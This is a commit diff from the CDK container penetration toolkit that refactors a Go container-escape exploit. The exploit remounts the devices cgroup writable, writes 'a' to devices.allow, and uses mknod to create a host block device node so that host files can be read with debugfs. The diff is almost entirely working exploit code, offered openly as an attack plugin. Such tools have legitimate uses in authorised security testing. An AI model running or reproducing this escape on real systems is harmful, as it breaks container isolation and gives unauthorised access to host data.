update rewrite and mknod function more elegant by yeahx

cdk-team · Jan 29, 2021 · e1a31ad · e1a31ad
1 parent 3b256b2
commit e1a31ad
Showing 1 changed file with 26 additions and 31 deletions.
diff --git a/pkg/exploit/rewrite_cgroup_devices.go b/pkg/exploit/rewrite_cgroup_devices.go
@@ -8,8 +8,6 @@ import (
 	"log"
 	"os"
 	"path/filepath"
-	"regexp"
-	"strings"
 	"syscall"
 )
 
@@ -31,13 +29,6 @@ func fileInode(path string) (inodeID uint64, err error) {
 	return 0, nil
 }
 
-func generateCreateMknodCmd(allowPath string, deviceID string) (string) {
-	shell := CreateMknodCmd
-	shell = strings.Replace(shell, "${DevicesAllowPath}", allowPath, -1)
-	shell = strings.Replace(shell, "${DeviceID}", deviceID, -1)
-	return shell
-}
-
 // runShellFile run shell script use bash
 func runShellFile(filePreString string, shell string) error {
 
@@ -99,31 +90,42 @@ func (p cgroupDevicesExploitS) Run() bool {
 	log.Printf("find cgroup devices.allow file: %s\n", devicesAllowPath)
 
 	// get "virtblk" device ID
-	data, err := ioutil.ReadFile(procDeviceConfig)
+	mountInfos, err := util.GetMountInfo()
 	if err != nil {
-		log.Printf("err found while open %s: %v\n", procDeviceConfig, err)
-		return false
-	}
-	r := regexp.MustCompile(`(\d+) virtblk`)
-	ret := r.FindStringSubmatch(string(data))
-	if len(ret) < 2 {
+		log.Printf("get mount info error: %v", err)
 		return false
 	}
-	did := ret[1]
-	log.Printf("get virtblk device ID: %s\n", did)
 
 	// rewrite and mknod
-	shell := generateCreateMknodCmd(devicesAllowPath, did)
-	err = runShellFile("device-mknod", shell)
+	err = util.SetBlockAccessible(devicesAllowPath)
 	if err != nil {
-		log.Printf("run /tmp/device-mknod-* error: %s\n", err)
+		log.Printf("set block accessible err %v", err)
 		return false
 	}
 
-	// escape done~
-	log.Println("now, run 'debugfs cdk_mknod_result' to browse host files.")
+	// use lxcfs_rw exp function by https://github.com/yeahx
+	for _, mi := range mountInfos {
+		if util.FindTargetDeviceID(&mi) {
+
+			dev := util.MakeDev(mi.Marjor, mi.Minor)
+			if dev == 0 {
+				log.Printf("Blockdevice Marjor/Minor number invalid.")
+				return false
+			}
+
+			err = syscall.Mknod("./cdk_mknod_result", syscall.S_IFBLK|uint32(os.FileMode(0700)), dev)
+			if err != nil {
+				log.Printf("mknod err: %v", err)
+				return false
+			} else {
+				// escape done~
+				log.Println("now, run 'debugfs cdk_mknod_result' to browse host files.")
+				return true
+			}
+		}
+	}
 
-	return true
+	return false
 }
 
 // MountCgroupCmd remount a write-able devices cgroup subsystem
@@ -132,13 +134,6 @@ mount -oremount,rw /sys/fs/cgroup
 mkdir /sys/fs/cgroup/cgneartest
 mount -t cgroup -o devices devices /sys/fs/cgroup/cgneartest`
 
-var CreateMknodCmd = `set -uex
-echo a > ${DevicesAllowPath}
-sleep 2
-mknod cdk_mknod_result b ${DeviceID} 1`
-
-var procDeviceConfig = `/proc/devices`
-
 func init() {
 	exploit := cgroupDevicesExploitS{}
 	plugin.RegisterExploit("rewrite-cgroup-devices", exploit)